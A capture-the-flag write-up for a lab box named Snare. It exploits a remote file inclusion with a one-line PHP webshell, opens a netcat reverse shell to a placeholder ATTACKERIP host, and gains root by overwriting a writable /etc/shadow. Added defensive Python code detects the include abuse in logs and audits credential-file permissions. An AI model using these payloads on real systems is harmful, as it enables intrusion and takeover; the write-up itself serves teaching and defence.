Snare
Snare was an easy-level box where we leveraged an RFI to get a foothold on the system. After further enumeration we found that we had write access to a critical system file, and by overwriting it we got root.
Initial Enumeration.
Nmap Result.
```
$ nmap -vvv -p 22,80 -4 -sV -oN nmap 10.150.150.18
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We see the following ports open:
- Port 22 is running OpenSSH 8.2p1
- Port 80 is running Apache 2.4.41
From the Nmap scan we learn that the target server is running Ubuntu.
PORT 80
I ran a basic directory-busting scan against this port with gobuster, which gave the following results.
```
$ gobuster dir -u http://10.150.150.18/ -w ~/HackStuff/wordlists/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-medium.txt -x php,html,txt -o gobuser.log -t 30
...[SNIP]...
/index.php (Status: 302) [Size: 953] [--> /index.php?page=home]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
/about.php (Status: 200) [Size: 996]
/contact.php (Status: 200) [Size: 941]
/home.php (Status: 200) [Size: 946]
/includes (Status: 301) [Size: 317] [--> http://10.150.150.18/includes/]
```
Upon visiting the webpage, we see a couple of things.
- The content on the webpage is not useful, just lorem ipsum.
- When I click the different tabs (home, about us, contact), the `page` parameter in the URL changes.
So there is a possible LFI/RFI in that parameter. Let's check the /includes directory first.
Most of the files there were empty or useless; design-top.php, for example, only returns the heading.
Getting FootHold
I tried some LFI payloads and fuzzed with lfi-jhaddix.txt, but none of them worked. Then I noticed the URL doesn't use the .php extension: for contact.php it uses ?page=contact, so the application is probably appending the .php extension itself. Let's verify that with the help of /includes.
Including a file from /includes with its .php extension doesn't work, but it does work when I remove the .php extension.
So the LFI is confirmed, but we can't fully leverage it on its own. To turn it into code execution we need an RFI so we can host our own PHP file. I hosted a file on my local machine and sent a request to a URL like this:
http://10.150.150.18/index.php?page=http://ATTACKERIP:9000/test
```
➜ 10.150.150.18 echo test > test.php
➜ 10.150.150.18 python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
```
And it got included in the page source!
So to get a shell, I just hosted this simple webshell:
```
➜ 10.150.150.18 /bin/cat simple-web-shell.php
<?=`$_GET[0]`?>
➜ 10.150.150.18
```
and sent this request through Caido/Burp.
- For cURL it would look like this:
```
curl -k $'http://10.150.150.18/index.php?0=busybox+nc+ATTACKERIP+4444+-e+bash&page=http://ATTACKERIP:9000/simple-web-shell'
```
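The include bug above leaves a clear trace in the web server's access log: every abuse goes through the `page` parameter, and the values are either traversal sequences, PHP stream wrappers, or a full URL to a host the application has no business fetching from. The following detector is an added example, not code from the writeup or the box; it parses a few constructed Apache combined-log lines, extracts `page`, and flags anything that is not one of the three legitimate page names (the allow-list is the same fix the application should have applied before calling `include`). The sample log lines, the attacker IP 203.0.113.7 and the `ALLOWED_PAGES` set are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 946
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=includes/design-top HTTP/1.1" 200 120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=http://203.0.113.7:9000/test HTTP/1.1" 200 960
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?0=id&page=http://203.0.113.7:9000/simple-web-shell HTTP/1.1" 200 1001
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 3000
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumed allow-list: the only pages the application should ever include.
ALLOWED_PAGES = {"home", "about", "contact"}

REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
WRAPPER_SCHEMES = {"php", "data", "expect", "phar", "zip", "glob", "file"}


def classify_page(value):
    """Return a reason string if a `page` value looks hostile, else None."""
    scheme = urlsplit(value).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote include (RFI)"
    if scheme in WRAPPER_SCHEMES:
        return "stream wrapper"
    if "\x00" in value:
        return "null byte"
    if "../" in value or "..\\" in value:
        return "directory traversal (LFI)"
    if value not in ALLOWED_PAGES:
        return "page outside allow-list"
    return None


def scan_log(text):
    """Yield one finding per suspicious `page` parameter seen in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        qs = parse_qs(urlsplit(m["uri"]).query, keep_blank_values=True)
        for page in qs.get("page", []):
            reason = classify_page(page)
            if reason:
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "page": page,
                    "reason": reason,
                    # other parameters travelling with the include (e.g. the webshell's `0`)
                    "extra_params": sorted(k for k in qs if k != "page"),
                })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['reason']}: page={h['page']} extra={h['extra_params']}")
```

The `extra_params` field is what turns an RFI alert into a code-execution alert: the webshell used above takes its command through a second query parameter, so a remote `page` value arriving together with unrelated parameters is worth a higher severity than the remote include alone.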
Privesc
www-data to root
- First we will grab FLAG1.txt.
```
(remote) www-data@snare:/var/www/html$ wc -c /home/snare/FLAG1.txt
41 /home/snare/FLAG1.txt
(remote) www-data@snare:/var/www/html$
```
Voila!
/etc/shadow is writable by us! Getting root will be very easy: first we generate a custom password hash for root.
```
➜ 10.150.150.18 mkpasswd -m sha-512 toor
$6$BJ.kkMHkFyWO5ZWY$v50PydIPTgJ.CQfJrX8hnkHp8dyaqlvn.brWxBlwJa28LrElXwBYEly2Mbd/n70WO291loSufYSIdCLqkuUNk1
➜ 10.150.150.18
```
- Then we edit /etc/shadow, replace root's original hash with this hash, and simply run `su root` with the password `toor` to become root.
```
(remote) www-data@snare:/tmp$ su root
Password:
root@snare:/tmp# wc -c /root/FLAG2.txt
41 /root/FLAG2.txt
root@snare:/tmp#
```
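The whole escalation rests on one misconfiguration: /etc/shadow being writable by an unprivileged user. On Debian and Ubuntu the file ships as root:shadow with mode 0640, so the deviation is trivial to catch with a periodic permission audit. The script below is an added example, not part of the writeup; it compares the mode and owner of a small set of credential files against their expected maximums and reports anything looser, with world-writable files called out separately. The `CRITICAL_FILES` table and the `demo()` scenario (a fake shadow file left at 0666 beside a correct 0640 copy, created in a temporary directory so the audit can be exercised offline) are assumptions for the example.

```python
import os
import stat
import tempfile

# Expected maximum permissions for credential files on a Debian/Ubuntu host.
# Any bit set beyond these, or a non-root owner, is reported.
CRITICAL_FILES = {
    "/etc/shadow": 0o640,
    "/etc/gshadow": 0o640,
    "/etc/passwd": 0o644,
    "/etc/group": 0o644,
    "/etc/sudoers": 0o440,
}


def audit_file(path, max_mode, expect_uid=0):
    """Return a list of findings for one file; an empty list means it looks fine."""
    findings = []
    try:
        st = os.lstat(path)  # lstat: a symlink in place of the file is itself a finding
    except FileNotFoundError:
        return [f"{path}: missing"]
    mode = stat.S_IMODE(st.st_mode)
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{path}: is a symlink")
    if st.st_uid != expect_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, expected {expect_uid}")
    if mode & stat.S_IWOTH:
        # This is the Snare case: anyone, including www-data, can rewrite the file.
        findings.append(f"{path}: world-writable ({mode:04o})")
    if mode & ~max_mode:
        findings.append(f"{path}: mode {mode:04o} exceeds allowed {max_mode:04o}")
    return findings


def audit(files=CRITICAL_FILES, expect_uid=0):
    """Audit every file in the table and collect all findings."""
    out = []
    for path, max_mode in files.items():
        out.extend(audit_file(path, max_mode, expect_uid))
    return out


def demo():
    """Constructed scenario: a fake shadow file left 0666 next to a correct 0640 copy."""
    d = tempfile.mkdtemp()
    bad = os.path.join(d, "shadow-bad")
    good = os.path.join(d, "shadow-good")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("root:*:19000:0:99999:7:::\n")  # placeholder shadow entry, locked account
    os.chmod(bad, 0o666)
    os.chmod(good, 0o640)
    # The temp files are owned by the current user, so that is the expected uid here.
    return audit({bad: 0o640, good: 0o640}, expect_uid=os.getuid())


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

Run as root on the real host, `audit()` checks the live files; `demo()` only touches files it creates itself. Ownership is checked as well as mode because a file that is 0640 but owned by www-data is just as writable by the web server as a 0666 one.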